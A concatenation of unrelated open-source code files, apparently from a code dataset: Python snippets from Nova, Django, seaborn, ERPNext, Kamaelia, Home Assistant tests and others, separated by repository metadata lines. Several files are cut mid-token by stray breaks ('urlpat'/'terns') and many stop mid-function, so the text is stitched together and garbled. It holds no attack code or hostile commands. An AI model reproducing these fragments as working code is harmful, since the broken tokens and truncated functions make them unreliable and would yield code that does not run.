self._session = session
self._virtapi = virtapi
self._volumeops = volumeops.VolumeOps(self._session)
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self._virtapi,
xenapi_session=self._session)
vif_impl = importutils.import_class(CONF.xenapi_vif_driver)
self.vif_driver = vif_impl(xenapi_session=self._session)
self.default_root_dev = '/dev/sda'
# configs for image license activation:
self._rax_image_activation_config = RaxImageActivationConfig()
msg = _("Importing image upload handler: %s")
LOG.debug(msg % CONF.xenapi_image_upload_handler)
self.image_upload_handler = importutils.import_object(
CONF.xenapi_image_upload_handler)
@property
def agent_enabled(self):
return not CONF.xenapi_disable_agent
def _get_agent(self, instance, vm_ref):
if self.agent_enabled:
return xapi_agent.XenAPIBasedAgent(self._session, self._virtapi,
instance, vm_ref)
raise exception.NovaException(_("Error: Agent is disabled"))
def list_instances(self):
|
richbs/django-record-collector
|
recollect/urls.py
|
Python
|
bsd-3-clause
| 275
| 0.007273
|
from django.conf.urls import patterns, url
urlpat
|
terns = patterns(
|
'',
url(r'^$', 'recollect.views.home', name='home'),
url(r'^albums$', 'recollect.views.albums', name='albums'),
url(r'^album/(?P<album_slug>[A-z0-9-]+)$', 'recollect.views.album', name='album'),
)
|
Geheimorganisation/sltv
|
sltv/ui/input/autoaudioinput.py
|
Python
|
gpl-2.0
| 1,172
| 0.000854
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010 Holoscópio Tecnologia
# Author: Luciana Fujii Pontello <luciana@holoscopio.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FI
|
TNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Stree
|
t, Fifth Floor, Boston, MA 02110-1301 USA.
import gobject
import gtk
from sltv.settings import UI_DIR
from core import InputUI
class AutoAudioInputUI(InputUI):
def __init__(self):
InputUI.__init__(self)
def get_widget(self):
return None
def get_name(self):
return "AutoAudio"
def get_description(self):
return "Auto Audio Source"
|
ericmjl/protein-interaction-network
|
proteingraph/features.py
|
Python
|
mit
| 501
| 0
|
"""
Author: Eric J. Ma
License: MIT
A Python module that provides helper functions and variables for encoding amino
acid features in the protein interaction network. We encode features in order
to feed the data into the neural fingerprinting
|
software later on.
"""
amino_acids = [
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M
|
",
"N",
"P",
"Q",
"R",
"S",
"T",
"V",
"W",
"X",
"Y",
"Z",
]
|
DanNixon/Sakuya
|
pc_client/sakuyaclient/NotificationSource.py
|
Python
|
apache-2.0
| 562
| 0.001779
|
from abc import ABCMeta, abstractmethod
class NotificationSource():
"""
|
Abstract class for all notification sources.
"""
__metaclass__ = ABCMeta
@abstractmethod
def poll(self):
"""
Used to get a set of changes between data retrieved in this call and the last.
"""
raise NotImplem
|
entedError('No concrete implementation!')
@abstractmethod
def name(self):
"""
Returns a unique name for the source type.
"""
raise NotImplementedError('No concrete implementation!')
|
matthew-brett/draft-statsmodels
|
scikits/statsmodels/sandbox/examples/ex_onewaygls.py
|
Python
|
bsd-3-clause
| 4,198
| 0.010005
|
# -*- coding: utf-8 -*-
"""Example: Test for equality of coefficients across groups/regressions
Created on Sat Mar 27 22:36:51 2010
Author: josef-pktd
"""
import numpy as np
from scipy import stats
#from numpy.testing import assert_almost_equal
import scikits.statsmodels as sm
from scikits.statsmodels.sandbox.regression.onewaygls import OneWayLS
#choose example
#--------------
example = ['null', 'diff'][1] #null: identical coefficients across groups
example_size = [10, 100][0]
example_size = [(10,2), (100,2)][0]
example_groups = ['2', '2-2'][1]
#'2-2': 4 groups,
# groups 0 and 1 and groups 2 and 3 have identical parameters in DGP
#generate example
#----------------
np.random.seed(87654589)
nobs, nvars = example_size
x1 = np.random.normal(size=(nobs, nvars))
y1 = 10 + np.dot(x1,[15.]*nvars) + 2*np.random.normal(size=nobs)
x1 = sm.add_constant(x1) #, prepend=True)
#assert_almost_equal(x1, np.vander(x1[:,0],2), 16)
#res1 = sm.OLS(y1, x1).fit()
#print res1.params
#print np.polyfit(x1[:,0], y1, 1)
#assert_almost_equal(res1.params, np.polyfit(x1[:,0], y1, 1), 14)
#print res1.summary(xname=['x1','const1'])
#regression 2
x2 = np.random.normal(size=(nobs,nvars))
if example == 'null':
y2 = 10 + np.dot(x2,[15.]*nvars) + 2*np.random.normal(size=nobs) # if H0 is true
else:
y2 = 19 + np.dot(x2,[17.]*nvars) + 2*np.random.normal(size=nobs)
x2 = sm.add_constant(x2)
# stack
x = np.concatenate((x1,x2),0)
y = np.concatenate((y1,y2))
if example_groups == '2':
groupind = (np.arange(2*nobs)>nobs-1).astype(int)
else:
groupind = np.mod(np.arange(2*nobs),4)
groupind.sort()
#x = np.column_stack((x,x*groupind[:,None]))
def print_results(res):
groupind = res.groups
#res.fitjoint() #not really necessary, because called by ftest_summary
ft = res.ftest_summary()
#print ft[0] #skip because table is nicer
print '\nTable of F-tests for overall or pairwise equality of coefficients'
print 'hypothesis F-statistic p-value df_denom df_num reject'
for row in ft[1]:
print row,
if row[1][1]<0.05:
print '*'
else:
print ''
print 'Notes: p-values are not corrected for many tests'
print ' (no Bonferr
|
oni correction)'
print ' * : reject at 5% uncorrected confidence level'
print 'Null hypothesis: all or pairwise coefficient are the same'
print 'Alternative hypothesis: all coefficients are different'
print '\nComparison with stats.f_oneway'
print stats.f_oneway(*[y[groupind==gr] for gr in res.unique])
print '\nLikelihood Ratio Test'
print 'likelihood ratio p-value df'
|
print res.lr_test()
print 'Null model: pooled all coefficients are the same across groups,'
print 'Alternative model: all coefficients are allowed to be different'
print 'not verified but looks close to f-test result'
print '\nOls parameters by group from individual, separate ols regressions'
for group in sorted(res.olsbygroup):
r = res.olsbygroup[group]
print group, r.params
print '\nCheck for heteroscedasticity, '
print 'variance and standard deviation for individual regressions'
print ' '*12, ' '.join('group %-10s' %(gr) for gr in res.unique)
print 'variance ', res.sigmabygroup
print 'standard dev', np.sqrt(res.sigmabygroup)
#get results for example
#-----------------------
print '\nTest for equality of coefficients for all exogenous variables'
print '-------------------------------------------------------------'
res = OneWayLS(y,x, groups=groupind.astype(int))
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor'
print '---------------------------------------------'
print 'this is the same as scipy.stats.f_oneway'
res = OneWayLS(y,np.ones(len(y)), groups=groupind)
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor with het is true'
print '--------------------------------------------------------------'
print 'this is the similar to scipy.stats.f_oneway,'
print 'but variance is not assumed to be the same across groups'
res = OneWayLS(y,np.ones(len(y)), groups=groupind, het=True)
print_results(res)
|
anandpdoshi/erpnext
|
erpnext/setup/install.py
|
Python
|
agpl-3.0
| 1,780
| 0.024719
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
default_mail_footer = """<div style="padding: 7px; text-align: right; color: #888"><small>S
|
ent via
<a style="color: #888" href="http://erpnext
|
.org">ERPNext</a></div>"""
def after_install():
frappe.get_doc({'doctype': "Role", "role_name": "Analytics"}).insert()
set_single_defaults()
create_compact_item_print_custom_field()
from frappe.desk.page.setup_wizard.setup_wizard import add_all_roles_to
add_all_roles_to("Administrator")
frappe.db.commit()
def check_setup_wizard_not_completed():
if frappe.db.get_default('desktop:home_page') == 'desktop':
print
print "ERPNext can only be installed on a fresh site where the setup wizard is not completed"
print "You can reinstall this site (after saving your data) using: bench --site [sitename] reinstall"
print
return False
def set_single_defaults():
for dt in frappe.db.sql_list("""select name from `tabDocType` where issingle=1"""):
default_values = frappe.db.sql("""select fieldname, `default` from `tabDocField`
where parent=%s""", dt)
if default_values:
try:
b = frappe.get_doc(dt, dt)
for fieldname, value in default_values:
b.set(fieldname, value)
b.save()
except frappe.MandatoryError:
pass
frappe.db.set_default("date_format", "dd-mm-yyyy")
def create_compact_item_print_custom_field():
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
create_custom_field('Print Settings', {
'label': _('Compact Item Print'),
'fieldname': 'compact_item_print',
'fieldtype': 'Check',
'default': 1,
'insert_after': 'with_letterhead'
})
|
sparkslabs/kamaelia_
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/JsonRPC/BDJsonRPC.py
|
Python
|
apache-2.0
| 35,300
| 0.013059
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
'''
Bi-directional JsonRPC Server and Client for Kamaelia.
Copyright (c) 2009 Rasjid Wilcox and CDG Computer Services.
Licensed to the BBC under a Contributor Agreement
'''
import Axon
from Axon.Handle import Handle
from Axon.background import background
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Kamaelia.Chassis.ConnectedServer import ServerCore
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Internet.TCPClient import TCPClient
from jsonrpc import JsonRpc20, RPCFault, METHOD_NOT_FOUND, INTERNAL_ERROR, ERROR_MESSAGE, REQUEST, RESPONSE, ERROR, json_split
from traceback import format_exc
from collections import defaultdict
import types, inspect, Queue
# FIXME: add protection from Denial of Service
# decorators to mark funcation args as either
# callback requests or callback notifications
def cb_request(arg_name, response_func, convert_args = False):
def cb_request_dec(func):
if not hasattr(func, '_callbacks_'):
func._callbacks_ = {}
if response_func:
func._callbacks_[arg_name] = ResponseCallback(response_func, convert_args)
else:
func._callbacks_[arg_name] = None
return func
return cb_request_dec
def cb_notification(arg_name):
return cb_request(arg_name, None)
class ResponseCallback(object):
def __init__(self, callback_func, convert_args = False):
'''if convert_args then convert a list, tuple or dict to args in standard jsonrpc way'''
self.callback_func = callback_func
self.convert_args = convert_args
class RequestOrNotification(object):
'If response_callback is None, then this is a notification'
def __init__(self, method, params = None, response_callback = None):
if response_callback: assert isinstance(response_callback, ResponseCallback)
self.method = method
self.params = params
self.response_callback = response_callback
class JsonRpcProtocol(object):
'Protocol Factory for JsonRpc over TCP'
def __init__(self, task_runner, id_prefix = 'server', debug = 0):
self.task_runner = task_runner
self.id_prefix = id_prefix
self.debug = debug
self.dispatch_table = {}
self.callback_table = defaultdict(dict) # try key on actual function
self.requests_on_connect = []
self.requests_on_connect_wait = None # id of request to wait for before sending next
self.requests_sent = {}
self._request_id_num = 1
self.connections = []
def get_request_id(self, request):
req_num = self._request_id_num
if self.id_prefix:
request_id = '%s-%s' % (self.id_prefix, req_num)
else:
request_id = req_num
assert isinstance(request, RequestOrNotification)
self.requests_sent[request_id] = request.response_callback
if request.response_callback:
self.add_callbacks(request.response_callback)
self._request_id_num += 1
return request_id
def add_callbacks(self, function):
if function in self.callback_table:
# already in callback table, so
|
just return
return
if hasattr(function, '_callbacks_'): # 'response_callback'):
|
for arg_name, response_callback in function._callbacks_.items():
name = function.__name__
self.callback_table[function][arg_name] = response_callback
print 'Added callback for method %s, argument %s' % (name, arg_name)
try:
# args by position - offset needed for instance methods etc
offset = 1 if (hasattr(function, 'im_self') and function.im_self) else 0
arg_num = inspect.getargspec(function)[0].index(arg_name) - offset
self.callback_table[function][arg_num] = response_callback
print 'Added callback for method %s, arg_num %s' % (name, arg_num)
except ValueError:
print 'WARNING: unable to determine argument position for callback on method %s, argument %s.\n' \
'Automatic callback conversion will not occur if called by position.' % (name, arg_name)
def add_function(self, function, name = None):
if name is None:
name = function.__name__
if name in self.dispatch_table:
raise ValueError('rpc method %s already exists!' % name)
self.dispatch_table[name] = function
print 'Added rpc method %s' % name
self.add_callbacks(function)
def add_instance(self, instance, prefix = None):
'''Add all callable attributes of an instance not starting with '_'.
If prefix is none, then the rpc name is just <method_name>,
otherwise it is '<prefix>.<method_name>
'''
for name in dir(instance):
if name[0] != '_':
func = getattr(instance, name, None)
if type(func) == types.MethodType:
if prefix:
rpcname = '%s.%s' % (prefix, func.__name__)
else:
rpcname = func.__name__
self.add_function(func, name = rpcname)
def add_request_on_connect(self, req_or_notification, wait = True):
self.requests_on_connect.append( (req_or_notification, wait) )
def __call__(self, **kwargs):
if self.debug >= 1:
print 'Creating new Protocol Factory: ', str(kwargs)
connection = Graphline( SPLITTER = JsonSplitter(debug = self.debug, factory = self, **kwargs),
DESERIALIZER = Deserializer(debug = self.debug, factory = self, **kwargs),
DISPATCHER = Dispatcher(debug = self.debug, factory = self, **kwargs),
RESPONSESERIALIZER = ResponseSerializer(debug = self.debug, factory = self, **kwargs),
REQUESTSERIALIZER = RequestSerializer(debug = self.debug, factory = self, **kwargs),
FINALIZER = Finalizer(debug = self.debug, factory = self, **kwargs),
TASKRUNNER = self.task_runner,
linkages = { ('self', 'inbox') : ('SPLITTER', 'inbox'),
('self', 'request') : ('REQUESTSERIALIZER', 'request'),
('SPLITTER', 'outbox') : ('DESERIALIZER', 'inbox'),
('DESERIALIZER', 'outbox'): ('DISPATCHER', 'inbox'),
('DESERIALIZER', 'error'): ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'outbox') : ('TASKRUNNER', 'inbox'),
('DISPATCHER', 'result_out') : ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'request_out') : ('REQUESTSERIALIZER', 'request'),
('RESPONSESERIALIZER', 'outbox') : ('self', 'outbox'),
('REQUESTSERIALIZER', 'outbox'): ('self', 'outbox'),
|
xiaoyongaa/ALL
|
python基础2周/17猜年龄游戏.py
|
Python
|
apache-2.0
| 1,545
| 0.027353
|
'''
笔记
for i in range(10):
#3次机会问一次
'''
age=22
c=0
while True:
if c<3:
cai=input("请输入要猜的年龄:")
if cai.isdigit(): #判断是否为整数
print("格式正确")
cai1=int(cai) #判断为整数把输入的变量变成int型
if cai1==age and c<3:
print
|
("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
else: #判断是否为整数
print("输入格式不正确")
else:
p=input("次数用完,是否要继续,继续请按:yes,不想继续请按no:")
if p=="yes":
c=0
cai=input("
|
请输入要猜的年龄:")
if cai.isdigit(): #判断是否为整数
print("格式正确2")
cai1=int(cai) #判断为整数把输入的变量变成int型
if cai1==age and c<3:
print("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
else: #判断是否为整数
print("输入格式不正确")
elif p=="no":
print("你选择了退出 bye bye")
break
|
cbcoutinho/learn_dg
|
tests/helpers.py
|
Python
|
bsd-2-clause
| 4,156
| 0.001444
|
import numpy as np
from ctypes import (
CDLL,
POINTER,
ARRAY,
c_void_p,
c_int,
byref,
c_double,
c_char,
c_char_p,
create_string_buffer,
)
from numpy.ctypeslib import ndpointer
import sys, os
prefix = {"win32": "lib"}.get(sys.platform, "lib")
extension = {"darwin": ".dylib", "win32": ".dll"}.get(sys.platform, ".so")
dir_lib = {"win32": "bin"}.get(sys.platform, "lib")
libcore = CDLL(os.path.join("build", dir_lib, prefix + "core" + extension))
def set_assembleElementalMatrix2D_c_args(N):
"""
Assign function and set the input arguement types for a 2D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N, 2), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_create_simple_array_c_args(N):
"""
Assign function and set arguement types of a simple array
"""
f = libcore.create_simple_array_c
f.argtypes = [ndpointer(shape=(N, N), dtype="double", flags="F")]
f.restype = None
return f
def set_assembleElementalMatrix1D_args(N):
"""
Assign function and set the input arguement types for a 1D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N,), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble1D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
Assign function and set the input arguement types for assembling a full 1D
matrix
(int, int, int, c_double(N), c_double(N1,N2), c_double, c_double, c_double(N,N))
"""
f = libcore.assemble1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts,), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
c_double,
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble2D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
Assign function and set the input arguement types for assembling a full 2D
matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assemble2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts, 2), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
ndpointer(shape=(2,), dtype="double", flags="F"),
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_single_row_args(N):
"""
Assign the arguments for arrays pascal rows
"""
f = libcore.pascal_single_row_c
f.argtypes = [
|
c_int,
c_double,
c_double,
ndpointer(shape=(N + 1,), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_2D_quad_c_args(N):
"""
Assign arguements for full (quadrilateral) pascal lines
"""
f = libcore.pascal_2D_quad_c
f.argtypes = [
c_int,
c_double,
c_double,
|
ndpointer(shape=((N + 1) ** 2,), dtype="double", flags="F"),
]
f.restype = None
return f
def pascal_2D_single_row(N, x, y):
xs = np.array([np.power(x, N - ii) for ii in range(N + 1)])
ys = np.array([np.power(y, ii) for ii in range(N + 1)])
return xs * ys
def pascal_2D_post_row(N, ii, x, y):
temp = pascal_2D_single_row(ii, x, y)
return temp[ii - N : N + 1]
def pascal_2D_total_row(N, x, y):
temp_pre = [pascal_2D_single_row(ii, x, y) for ii in range(N + 1)]
temp_post = [pascal_2D_post_row(N, ii, x, y) for ii in range(N + 1, 2 * N + 1)]
row = temp_pre + temp_post
return np.concatenate(row)
|
mhbu50/erpnext
|
erpnext/crm/doctype/campaign/test_campaign.py
|
Python
|
gpl-3.0
| 167
| 0.005988
|
# Copyrigh
|
t (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# See license.
|
txt
# import frappe
import unittest
class TestCampaign(unittest.TestCase):
pass
|
w1ll1am23/home-assistant
|
tests/components/homekit_controller/specific_devices/test_koogeek_ls1.py
|
Python
|
apache-2.0
| 3,555
| 0.000281
|
"""Make sure that existing Koogeek LS1 support isn't broken."""
from datetime import timedelta
from unittest import mock
from aiohomekit.exceptions import AccessoryDisconnectedError, EncryptionError
from aiohomekit.testing import FakePairing
import pytest
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR
from homeassistant.helpers import device_registry as dr, entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
LIGHT_ON = ("lightbulb", "on")
async def test_koogeek_ls1_setup(hass):
"""Test that a Koogeek LS1 can be correctly setup in HA."""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = er.async_get(hass)
# Assert that the entity is correctly added to the entity registry
entry = entity_registry.async_get("light.koogeek_ls1_20833f")
assert entry.unique_id == "homekit-AAAA011111111111-7"
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
state = await helper.poll_and_get_state()
# Assert that the friendly name is detected correctly
assert state.attributes["friendly_name"] == "Koogeek-LS1-20833F"
# Assert that all optional features the LS1 supports are detected
assert state.attributes["supported_features"] == (
SUPPORT_BRIGHTNESS | SUPPORT_COLOR
)
device_registry = dr.async_get(hass)
device = device_registry.async_get(entry.device_id)
assert device.manufacturer == "Koogeek"
assert device.name == "Koogeek-LS1-20833F"
assert device.model == "LS1"
assert device.sw_version == "2.2.15"
assert device.via_device_id is None
@pytest.mark.parametrize("failure_cls", [AccessoryDisconnectedError, EncryptionError])
async def test_recover_from_failure(hass, utcnow, failure_cls):
"""
Test that entity actually recovers from a
|
network connection drop.
See https://github.com/home-assistant/core/issues/18949
"""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
# Set light state on fake device to off
helper.characteristics[LIGHT_ON].se
|
t_value(False)
# Test that entity starts off in a known state
state = await helper.poll_and_get_state()
assert state.state == "off"
# Set light state on fake device to on
helper.characteristics[LIGHT_ON].set_value(True)
# Test that entity remains in the same state if there is a network error
next_update = dt_util.utcnow() + timedelta(seconds=60)
with mock.patch.object(FakePairing, "get_characteristics") as get_char:
get_char.side_effect = failure_cls("Disconnected")
state = await helper.poll_and_get_state()
assert state.state == "off"
chars = get_char.call_args[0][0]
assert set(chars) == {(1, 8), (1, 9), (1, 10), (1, 11)}
# Test that entity changes state when network error goes away
next_update += timedelta(seconds=60)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = await helper.poll_and_get_state()
assert state.state == "on"
|
mwaskom/seaborn
|
seaborn/axisgrid.py
|
Python
|
bsd-3-clause
| 87,264
| 0.000562
|
from itertools import product
from inspect import signature
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from ._core import VectorPlotter, variable_type, categorical_order
from . import utils
from .utils import _check_argument, adjust_legend_subtitles, _draw_figure
from .palettes import color_palette, blend_palette
from ._decorators import _deprecate_positional_args
from ._docstrings import (
DocstringComponents,
_core_docs,
)
__all__ = ["FacetGrid", "PairGrid", "JointGrid", "pairplot", "jointplot"]
_param_docs = DocstringComponents.from_nested_components(
core=_core_docs["params"],
)
class _BaseGrid:
"""Base class for grids of subplots."""
def set(self, **kwargs):
"""Set attributes on each subplot Axes."""
for ax in self.axes.flat:
if ax is not None: # Handle removed axes
ax.set(**kwargs)
return self
@property
def fig(self):
"""DEPRECATED: prefer the `figure` property."""
# Grid.figure is preferred because it matches the Axes attribute name.
# But as the maintanace burden on having this property is minimal,
# let's be slow about formally deprecating it. For now just note its deprecation
# in the docstring; add a warning in version 0.13, and eventually remove it.
return self._figure
@property
def figure(self):
"""Access the :class:`matplotlib.figure.Figure` object underlying the grid."""
return self._figure
def savefig(self, *args, **kwargs):
"""
Save an image of the plot.
This wraps :meth:`matplotlib.figure.Figure.savefig`, using bbox_inches="tight"
by default. Parameters are passed through to the matplotlib function.
"""
kwargs = kwargs.copy()
kwargs.setdefault("bbox_inches", "tight")
self.figure.savefig(*args, **kwargs)
class Grid(_BaseGrid):
"""A grid that can have multiple subplots and an external legend."""
_margin_titles = False
_legend_out = True
def __init__(self):
self._tight_layout_rect = [0, 0, 1, 1]
self._tight_layout_pad = None
# This attribute is set externally and is a hack to handle newer functions that
# don't add proxy artists onto the Axes. We need an overall cleaner approach.
self._extract_legend_handles = False
def tight_layout(self, *args, **kwargs):
"""Call fig.tight_layout within rect that exclude the legend."""
kwargs = kwargs.copy()
kwargs.setdefault("rect", self._tight_layout_rect)
if self._tight_layout_pad is not None:
kwargs.setdefault("pad", self._tight_layout_pad)
self._figure.tight_layout(*args, **kwargs)
def add_legend(self, legend_data=None, title=None, label_order=None,
adjust_subtitles=False, **kwargs):
"""Draw a legend, maybe placing it outside axes and resizing the figure.
Parameters
----------
legend_data : dict
Dictionary mapping label names (or two-element tuples where the
second element is a label name) to matplotlib artist handles. The
default reads from ``self._legend_data``.
title : string
Title for the legend. The default reads from ``self._hue_var``.
label_order : list of labels
The order that the legend entries should appear in. The default
reads from ``self.hue_names``.
adjust_subtitles : bool
If True, modify entries with invisible artists to left-align
the labels and set the font size to that of a title.
kwargs : key, value pairings
Other keyword arguments are passed to the underlying legend methods
on the Figure or Axes object.
Returns
-------
self : Grid instance
Returns self for easy chaining.
"""
# Find the data for the legend
if legend_data is None:
legend_data = self._legend_data
if label_order is None:
if self.hue_names is None:
label_order = list(legend_data.keys())
else:
label_order = list(map(utils.to_utf8, self.hue_names))
blank_handle = mpl.patches.Patch(alpha=0, linewidth=0)
handles = [legend_data.get(l, blank_handle) for l in label_order]
title = self._hue_var if title is None else title
title_size = mpl.rcParams["legend.title_fontsize"]
# Unpack nested labels from a hierarchical legend
labels = []
for entry in label_order:
if isinstance(entry, tuple):
_, label = entry
else:
label = entry
labels.append(label)
# Set default legend kwargs
kwargs.setdefault("scatterpoints", 1)
if self._legend_out:
kwargs.setdefault("frameon", False)
kwargs.setdefault("loc", "center right")
# Draw a full-figure legend outside the grid
figlegend = self._figure.legend(handles, labels, **kwargs)
self._legend = figlegend
figlegend.set_title(title, prop={"size": title_size})
if adjust_subtitles:
adjust_legend_subtitles(figlegend)
# Draw the plot to set the bounding boxes correctly
_draw_figure(self._figure)
# Calculate and set the new width of the figure so the legend fits
legend_width = figlegend.get_window_extent().width / self._figure.dpi
fig_width, fig_height = self._figure.get_size_inches()
self._figure.set_size_inches(fig_width + legend_width, fig_height)
# Draw the plot again to get the new transformations
_draw_figure(self._figure)
# Now calculate how much space we need on the right side
legend_width = figlegend.get_window_extent().width / self._figure.dpi
space_needed = legend_width / (fig_width + legend_width)
margin = .04 if self._margin_titles else .01
self._space_needed = margin + s
|
pace_needed
right = 1 - self._space_needed
# Place the subplot axes to give space for the legend
self._figure.subplots_adjust(right=right)
self._tight_layout_rect[2] = right
else:
# Draw a legend in the first axis
ax = self.axes.flat[0]
kwargs.setdefault("loc", "best")
leg = ax.legend(handles, labels, **kwargs)
|
leg.set_title(title, prop={"size": title_size})
self._legend = leg
if adjust_subtitles:
adjust_legend_subtitles(leg)
return self
def _update_legend_data(self, ax):
"""Extract the legend data from an axes object and save it."""
data = {}
# Get data directly from the legend, which is necessary
# for newer functions that don't add labeled proxy artists
if ax.legend_ is not None and self._extract_legend_handles:
handles = ax.legend_.legendHandles
labels = [t.get_text() for t in ax.legend_.texts]
data.update({l: h for h, l in zip(handles, labels)})
handles, labels = ax.get_legend_handles_labels()
data.update({l: h for h, l in zip(handles, labels)})
self._legend_data.update(data)
# Now clear the legend
ax.legend_ = None
def _get_palette(self, data, hue, hue_order, palette):
"""Get a list of colors for the hue variable."""
if hue is None:
palette = color_palette(n_colors=1)
else:
hue_names = categorical_order(data[hue], hue_order)
n_colors = len(hue_names)
# By default use either the current color palette or HUSL
if palette is None:
current_palette = utils.get_color_cycle()
if n_colors > len(current_palette):
colors = color_palette("husl", n_colors)
else:
|
pmverdugo/fiware-validator
|
validator/tests/clients/test_chef_client.py
|
Python
|
apache-2.0
| 4,428
| 0.001807
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Docker client tests"""
from __future__ import unicode_literals
import mock
import docker
from docker.errors import DockerException
from oslo_config import cfg
from validator.common.exception import DockerContainerException
import validator.tests.base as tb
from validator.clients.chef_client import ChefClient
CONF = cfg.CONF
CONF.import_group('clients_chef', 'validator.clients.chef_client_ssh')
class ChefClientTestCase(tb.ValidatorTestCase):
"""Docker Client unit tests"""
def setUp(self):
""" Create a docker client"""
super(ChefClientTestCase, self).setUp()
self.client = ChefClient()
CONF.set_override('cmd_test', "cmdtest {}", group='clients_chef')
CONF.set_override('cmd_install', "cmdinstall {}", group='clients_chef')
CONF.set_override('cmd_inject', "cmdinject {}", group='clients_chef')
CONF.set_override('cmd_launch', "cmdlaunch {}", group='clients_chef')
def test_create_client(self):
""" Test client creation"""
self.assertRaises(DockerException, ChefClient, 'fakeurl')
self.assertIsInstance(self.client.dc, docker.client.Client)
def test_run_container(self):
""" Test container deployment"""
self.assertRaises(DockerContainerException, self.client.run_container, "fakeimage")
self.client.dc = mock.MagicMock()
self.client.run_container('validimage')
self.client.dc.create_container.assert_called_once_with('validimage', name=u'validimage-validate', tty=True)
self.client.dc.start.assert_called_once_with(container=self.client.container)
def test_stop_container(self):
""" Test stopping and removing a container"""
self.client.dc = self.m.CreateMockAnything()
self.client.dc.stop(self.client.container)
self.client.dc.remove_container(self.client.container)
self.m.ReplayAll()
self.client.remove_container()
self.m.VerifyAll()
def test_run_deploy(self):
self.client.execute_command = mock.MagicMock()
self.client.execute_command.return_value = "Alls good"
self.client.run_deploy("mycookbook")
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
def test_run_install(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdinstall fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
